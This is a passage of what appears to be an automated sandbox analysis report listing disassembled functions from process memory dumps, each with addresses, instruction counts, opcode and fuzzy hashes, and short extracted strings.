              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction ID: 80d6c74dad3dd560155680c260b8c78db1903b5c5d4c3e089def3d8e5425b8a1
              • Opcode Fuzzy Hash: 1d088e264ba1794d49b050e02f8721f592c4eaea999c8a6cbcfa9b904b57b93f
              • Instruction Fuzzy Hash: 11016D70A1890ECAEB58EB6488A82B977A0FF1A305F50887ED41ED21D1DF7AB550D680
              Function 00007FFD34771C7D Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction ID: 0ef52f64f8eadecb1c6e1c121e74b62e04a81927c5a27138b94ad327b79dd881
              • Opcode Fuzzy Hash: 0ce9094660160381398108b5974882b9d2cdb000207b25fac72911173860b5b2
              • Instruction Fuzzy Hash: CAF0A470A0964E8FEB94DF24C8A52BA3BA0FF56304F80417AD80CC2292DB79E554D780
              Function 00007FFD3477CCD8 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction ID: ac0f5b8789d472bb0678553e31bff10e5ff637a0f7bef76d5edeb519005ba578
              • Opcode Fuzzy Hash: f4e8219e755bb39a31750abc2188971ff5d035e2e082b1a62d71f4e74bd2e3fe
              • Instruction Fuzzy Hash: 6CF0867090964ACFEB549F64C8A91F93FE0FF0A314F40497AE918C2051DBB85561D780
              Function 00007FFD3477AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction ID: ac1bc90c97dd83f338b37dc495fbaf86ef317c4adec960a3489529a61ba5e7c4
              • Opcode Fuzzy Hash: b71115db42333e392c4b70cde8afef85502c80ffb39c8e0b6796ebfbeacb94bc
              • Instruction Fuzzy Hash: B5F0A471A1C60DDEFB51EB3488DA5FD7BD0EF1A300F408871D508C2052EEB8B0549681
              Function 00007FFD347741C8 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5180b49e14fd2bc91d9b9be6843dcc8f7f47d4d1bb849863d4fc12b9e8e3d54c
              • Instruction ID: a87c264b3b5209b87fb63f1a7a08ee3d074c8abe732fd05b46c4ffe189c5d86e
              • Opcode Fuzzy Hash: 5180b49e14fd2bc91d9b9be6843dcc8f7f47d4d1bb849863d4fc12b9e8e3d54c
              • Instruction Fuzzy Hash: 6301E870A4451ECBEBB4DB04D890BE8B7B1EB94351F1086EA840EE7744DA786EC59F80
              Function 00007FFD34772769 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction ID: 5b803ac11d9aabc30c27f4d8622695e83e30d09d994a7db27dc7c0deae7cc883
              • Opcode Fuzzy Hash: 37d27e8b891576319aa9c7ecb3e9c7d4036a106a446e683a6ee49fd95ed3c01e
              • Instruction Fuzzy Hash: BAF0CD3090D3898FEB599F2488A92B93FB4BF06200F8548FAD619C61D2DA7CA454C791
              Function 00007FFD34781240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0cbe0f2887318cf481219d87190f68d334bc087e1e5d49ed6815b7ddc8ea2e6d
              • Instruction ID: d0b3e812ab31591adb28e47968f3d050ea198338d031c78dcde1fff9319a5b41
              • Opcode Fuzzy Hash: 0cbe0f2887318cf481219d87190f68d334bc087e1e5d49ed6815b7ddc8ea2e6d
              • Instruction Fuzzy Hash: D2F05E70A1860E8EEBC4EF6898592FE76A0FF15301F40053AE81DC2190DF346550C780
              Function 00007FFD347727DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction ID: 4af1c28f7f7542c0405f741d92d97629db8ba6b3375ebde65c0246d98ef41fe4
              • Opcode Fuzzy Hash: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction Fuzzy Hash: ABF0F671A0D689CFEB599F248C652B93FA0FF46300F8144BED519C20D2DB7EA414C340
              Function 00007FFD3477BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction ID: 125b28653c1e870cc639769c85b7230cb6eb49b3383d0f640ad982722c690d1b
              • Opcode Fuzzy Hash: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction Fuzzy Hash: 48D01260A4C40BC9DB60D614C894EFC76649F15300F60D5B1811DD2082DD7879C46B80

              Non-executed Functions

              Function 00007FFD3477F6AD Relevance: 8.9, Strings: 7, Instructions: 102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd34770000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: $"$=$C$Y$[$]
              • API String ID: 0-3933176780
              • Opcode ID: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction ID: 72d4960bab238a9ac598863d8dda91ce81924a6da05fa1d0957f65d51910ec93
              • Opcode Fuzzy Hash: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction Fuzzy Hash: 4D41B6B0D1562ACFEBA4DF14C9947F9BAB1AF15305F4044FAD11DD6281CB786A84DF80

              Executed Functions

              Function 00007FFD3476CAA9 Relevance: .4, Instructions: 417COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea44b07c1cb2d6b949667945e4708aa751d5eb33dd690d4306596563d1d0da37
              • Instruction ID: 31b7b03450f587ab8ca627794f873fb13e966b1769f31122952e70fe161f0fb4
              • Opcode Fuzzy Hash: ea44b07c1cb2d6b949667945e4708aa751d5eb33dd690d4306596563d1d0da37
              • Instruction Fuzzy Hash: 46C1B467B0DA529FE71177BDB4A51FD7B64EF83235B0804B7D288CA093D91C748A82E1
              Function 00007FFD34763565 Relevance: .3, Instructions: 275COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b3681ee6c6f8fc43931379a88bca99ca909aa4358662a3eec2541148018b27d
              • Instruction ID: 07c1a78c28d5698d9800bab53446a98e7de1010b9ed25b6cb2b0f1b8a052ee84
              • Opcode Fuzzy Hash: 1b3681ee6c6f8fc43931379a88bca99ca909aa4358662a3eec2541148018b27d
              • Instruction Fuzzy Hash: 8E919F71B18A4E8EEB94DB6CD8657AC7BE2FF9A310F54017AC00DD72D6CBA82805C741
              Function 00007FFD3477050C Relevance: 8.9, Strings: 7, Instructions: 168COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: 1$?$H$K$L$k${
              • API String ID: 0-824296765
              • Opcode ID: 7ae6a345932d6b467c19595204c4f0c3cf345a8c2c7b83644cbb1e8f432dd643
              • Instruction ID: 51c47d1be67c5247b2f33e7739d952fc64fe95c99006d65cc95ea19eb6eab4fd
              • Opcode Fuzzy Hash: 7ae6a345932d6b467c19595204c4f0c3cf345a8c2c7b83644cbb1e8f432dd643
              • Instruction Fuzzy Hash: D0611DB1E08A69CFDBA8DB14C8957ADB7B1EB55311F1001FAD10DE2291DA386EC18F41
              Function 00007FFD3476EB56 Relevance: 3.8, Strings: 3, Instructions: 53COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 3f48270cfd1ef36a25f363290a3f395418f645847a26f25c2193d4db8eafac2c
              • Instruction ID: 08968b19dd13c1206a12f8e36cf32ee51c85bc4178ffab2568a220fd90174b6c
              • Opcode Fuzzy Hash: 3f48270cfd1ef36a25f363290a3f395418f645847a26f25c2193d4db8eafac2c
              • Instruction Fuzzy Hash: 7621DCB0919229CFEB64DF14C8947E876F2AB59311F0041F9D60DE2281CB7C6A94DF85
              Function 00007FFD3476DCC9 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: Nd4$p\d4
              • API String ID: 0-2717961989
              • Opcode ID: 498da85899a7171e9c71c527560c7c69536cf8153189518edda2a655f3d1e103
              • Instruction ID: b6581fddfcd27ccf019f474ea3b18ccdbc4a435ad008eabccd53d3bda0a355fb
              • Opcode Fuzzy Hash: 498da85899a7171e9c71c527560c7c69536cf8153189518edda2a655f3d1e103
              • Instruction Fuzzy Hash: B5F11F71E289598FDB98EB58C4A57F8B7E2FF59314F1441BAD00DE7292CA386840DB41
              Function 00007FFD3476DD31 Relevance: 2.8, Strings: 2, Instructions: 315COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: Nd4$p\d4
              • API String ID: 0-2717961989
              • Opcode ID: bdf605c7e86ff705058d413c879e1931fc2c6507098ee9527734521deb0b6128
              • Instruction ID: 3c1e1f88c448106b698491dfa1f546e3711270b6102be19e23eca3da33d119be
              • Opcode Fuzzy Hash: bdf605c7e86ff705058d413c879e1931fc2c6507098ee9527734521deb0b6128
              • Instruction Fuzzy Hash: 94B110B1A189598FEBA8EF58C4A57F8B7A2FF55314F0441BED10DE7292CE386840DB41
              Function 00007FFD3476D02D Relevance: 1.6, Strings: 1, Instructions: 346COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: #t
              • API String ID: 0-1562333614
              • Opcode ID: 672fdb82b6cc33e5b1d3674ed085485a5dc0af2f7c69da0cd1f38120a6ff1bf8
              • Instruction ID: b9e9e39ff1bb76e6daff6b8be09db22b10139ce77ab8cb9cc8a3c7c1706b010b
              • Opcode Fuzzy Hash: 672fdb82b6cc33e5b1d3674ed085485a5dc0af2f7c69da0cd1f38120a6ff1bf8
              • Instruction Fuzzy Hash: C3C191B1F1855ACBEB54EBA8D4A52FD7BA1EF46324F00417AD108E7282CE3C7945DB80
              Function 00007FFD3476CF08 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: #t
              • API String ID: 0-1562333614
              • Opcode ID: 5fd1b16ce6fd2a4b3e2b2152bfdeb28ebc2a259c28657b31515f3a9c62c3aafc
              • Instruction ID: cb426d6f87683b04fc067889ea32463cc70071e7a129daad81bf59c5b66ac0e6
              • Opcode Fuzzy Hash: 5fd1b16ce6fd2a4b3e2b2152bfdeb28ebc2a259c28657b31515f3a9c62c3aafc
              • Instruction Fuzzy Hash: 18615763B1C9468AE751ABA8A8A91FD7BE0FF46321B4484BBD10CD6193DD28B584C2C1
              Function 00007FFD3476ED2A Relevance: 1.4, Strings: 1, Instructions: 118COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: 73434ff2f7ea0b8b16a75fe9c9e3e62a25815fa695b1e1fcb98210815fd8b881
              • Instruction ID: d82433739c1df5ec22fd194abf8582337fbae206a3c7f9a7cc563e0c0311de5e
              • Opcode Fuzzy Hash: 73434ff2f7ea0b8b16a75fe9c9e3e62a25815fa695b1e1fcb98210815fd8b881
              • Instruction Fuzzy Hash: CE411771A18A598FEBA8DB18CC95BADB3B1FB54311F1001EAD44DE3291DE396EC18F40
              Function 00007FFD3476C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: T_H
              • API String ID: 0-1617441069
              • Opcode ID: 44f8d5c2ec9efe29f4e5dda716193463e97c6f01ae6386ec43142411b74d1d1f
              • Instruction ID: 23361952f8bb17c9f077019022093c589279da60303d2322d6d5093eaa115730
              • Opcode Fuzzy Hash: 44f8d5c2ec9efe29f4e5dda716193463e97c6f01ae6386ec43142411b74d1d1f
              • Instruction Fuzzy Hash: 0A31DCB1E1891D8FDB94EB5898A56ECB7B2FF9A310F501139D10DE3246DE2C68419B40
              Function 00007FFD347715B2 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 3d31f107fc5fe7a422d20020a707a56a6a89bb9fcf78fad333c06bc1deeef46e
              • Instruction ID: ee0dd7201e2d5692bce1cf74d483c81ccfd8ff3aa8986b4dae2baab44ca5e6bb
              • Opcode Fuzzy Hash: 3d31f107fc5fe7a422d20020a707a56a6a89bb9fcf78fad333c06bc1deeef46e
              • Instruction Fuzzy Hash: EB310675E08629CEEB64DF54C8A47E9B7B1FB55310F5041AAD50DE3281CF786984DF80
              Function 00007FFD34760A01 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: 8ve4
              • API String ID: 0-2107207911
              • Opcode ID: 1901781285ff4b90254b89111e27d84bf0d41dacb63c8027a3fcff60e9c74a5b
              • Instruction ID: 89ed5790a7bb63084a74b8b24810f446dc1bef855275ff87bc5603f7ec62f194
              • Opcode Fuzzy Hash: 1901781285ff4b90254b89111e27d84bf0d41dacb63c8027a3fcff60e9c74a5b
              • Instruction Fuzzy Hash: 2411E4B1A0858E8FE7A0EB6888A85A97BE2FF06350F4445B6D108D7093DF3CB4408780
              Function 00007FFD3476124D Relevance: 1.3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pye4
              • API String ID: 0-677725960
              • Opcode ID: d3e40a0e760fadd76fea1e0e6d87e67ad1a96f8b2ca5e8d0d4156d67198079ee
              • Instruction ID: 6170b30526cac5a761789d69bbe67e4f5ba0669dd95c725332a9f0a099597315
              • Opcode Fuzzy Hash: d3e40a0e760fadd76fea1e0e6d87e67ad1a96f8b2ca5e8d0d4156d67198079ee
              • Instruction Fuzzy Hash: 0C11E4B1B0858A8EEB99DB68C4F86B97BE1FF57320F0404BED14AD60D3DA2CA544D740
              Function 00007FFD34761260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pye4
              • API String ID: 0-677725960
              • Opcode ID: c9987be6709317e24ad151749de732417321a77507de6415eefe2cca2764da4d
              • Instruction ID: 82eecd6fda049012dd36a6fdc6fbe0d7bd685ae9f4da5299dbac6a82568b0a49
              • Opcode Fuzzy Hash: c9987be6709317e24ad151749de732417321a77507de6415eefe2cca2764da4d
              • Instruction Fuzzy Hash: 38F0FFB0F0954E8EEB989BA489AC2F977E1FF47324F00007AE04AC20D2DE2C6504D680
              Function 00007FFD347616C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af178a388547c150304b723f5e3de85dc674f56a37b18f9f5b4c4929c90dc43e
              • Instruction ID: 07f2a97b8a492702c94b7154de1baa3c444cc947cf082e676c7e28f2636d291c
              • Opcode Fuzzy Hash: af178a388547c150304b723f5e3de85dc674f56a37b18f9f5b4c4929c90dc43e
              • Instruction Fuzzy Hash: 7F91B371B0CA498FDB59DE1888A55B977E2FF99314B14057EE59ED3282CE38F8028781
              Function 00007FFD34760CF8 Relevance: .3, Instructions: 277COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8eebfac61b27783acf8ccbbbc928e305d9c02b2f0776a6d5aecb1f2d040a705
              • Instruction ID: e54f30a307de309a4c0844c75a7496bc5d477101d3b5a8cdc3aa51084527579b
              • Opcode Fuzzy Hash: e8eebfac61b27783acf8ccbbbc928e305d9c02b2f0776a6d5aecb1f2d040a705
              • Instruction Fuzzy Hash: EFA1E9B1F089598EEB54EB688865BED73A2FF55320F0042BAD10DE7192DF3C79458B80
              Function 00007FFD34761CFD Relevance: .2, Instructions: 174COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b4a19effcce032a3704f010b4258cd31d762ffff35134c8f16d1b9896a6bd0a
              • Instruction ID: 306c6bf4dedddeed315477acc83c8822cdfc5be7220f97a43d5f65b372068c9b
              • Opcode Fuzzy Hash: 4b4a19effcce032a3704f010b4258cd31d762ffff35134c8f16d1b9896a6bd0a
              • Instruction Fuzzy Hash: 0751E770B18A898FDB58DE18C8A95B977E2FF99310B14457ED58AC7281CE38F802C7C1
              Function 00007FFD34763155 Relevance: .2, Instructions: 169COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f87a693e0e0d3f38b33196cc78ba7c66baa791b8b0e7b04920a12537ea087be
              • Instruction ID: c0837e8e989548bd9d59340ea98ef2486cc74779c4763da5250b9876d93f427b
              • Opcode Fuzzy Hash: 2f87a693e0e0d3f38b33196cc78ba7c66baa791b8b0e7b04920a12537ea087be
              • Instruction Fuzzy Hash: A95118B1E0851DCFEB94EB98C4A46EDB7B2EF59321F500039D109E7295DA3CA944DB80
              Function 00007FFD3476CB4D Relevance: .2, Instructions: 166COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48ced8811fef959c6d6362908a562df4f309db0c1b03800fd37d1e370e09c7f2
              • Instruction ID: d7c9fb773b3a5faf9114bb2cbf360bb434ac87ef11474d6bc5ee943a305b4f96
              • Opcode Fuzzy Hash: 48ced8811fef959c6d6362908a562df4f309db0c1b03800fd37d1e370e09c7f2
              • Instruction Fuzzy Hash: D741A467B089178BE7107BADB0661FE7754EF82339B044537D24CDA083DE2C349596D4
              Function 00007FFD3476CB78 Relevance: .1, Instructions: 147COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf2e02308b48d0fe40318469a1505516663bcade8d0cce521c430d3ec598f305
              • Instruction ID: 153c34e6e57a6aeba142e89c66b1a792a1fb3cf48370eda1f43d0d126f5efa1f
              • Opcode Fuzzy Hash: cf2e02308b48d0fe40318469a1505516663bcade8d0cce521c430d3ec598f305
              • Instruction Fuzzy Hash: 2F41A2A7B089178BE714BBADB0A61FD7755EF82339B040537D20CCA083DE2C709996D4
              Function 00007FFD3476CB80 Relevance: .1, Instructions: 143COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 046a107f5392bbd086ad96f334b0153b14c1f07c1932647f7e6cd0dbd70b0465
              • Instruction ID: 1fef444953eb01355552d1426c071dd64c9b7644956571a7abe16b867cf49485
              • Opcode Fuzzy Hash: 046a107f5392bbd086ad96f334b0153b14c1f07c1932647f7e6cd0dbd70b0465
              • Instruction Fuzzy Hash: C14190A7B089178BE715BBADB0A61FD7795EF82339B040537D20CCA093DE2C709596D4
              Function 00007FFD34762115 Relevance: .1, Instructions: 142COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cae5afdcf3583d40cfc28d5bcd68e51af3ad6e27c5320ad2c350aa9f2e335be1
              • Instruction ID: b156a515e1be7f271da6471dc194292d5cfd9878b5dbc6b710c4a6a4a8cfc82b
              • Opcode Fuzzy Hash: cae5afdcf3583d40cfc28d5bcd68e51af3ad6e27c5320ad2c350aa9f2e335be1
              • Instruction Fuzzy Hash: 98416A71B0DA8A8FE795E77888A51B877D2EF47320F0545BAD50DC7193DE2CB8418381
              Function 00007FFD3476CC12 Relevance: .1, Instructions: 135COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b394742bcb7d826120b523e517c2c9ad94fd8dcb157668dca225adb72c4f4f38
              • Instruction ID: b06ffe486627989d687f33e6a5e46338472b9eb36eafdec654c7440d7dfec630
              • Opcode Fuzzy Hash: b394742bcb7d826120b523e517c2c9ad94fd8dcb157668dca225adb72c4f4f38
              • Instruction Fuzzy Hash: 1B41D1A7B089179FE710BAADB4A60FD7755EF82339B040437D60CCA093DE2C349996D4
              Function 00007FFD3476CBD3 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
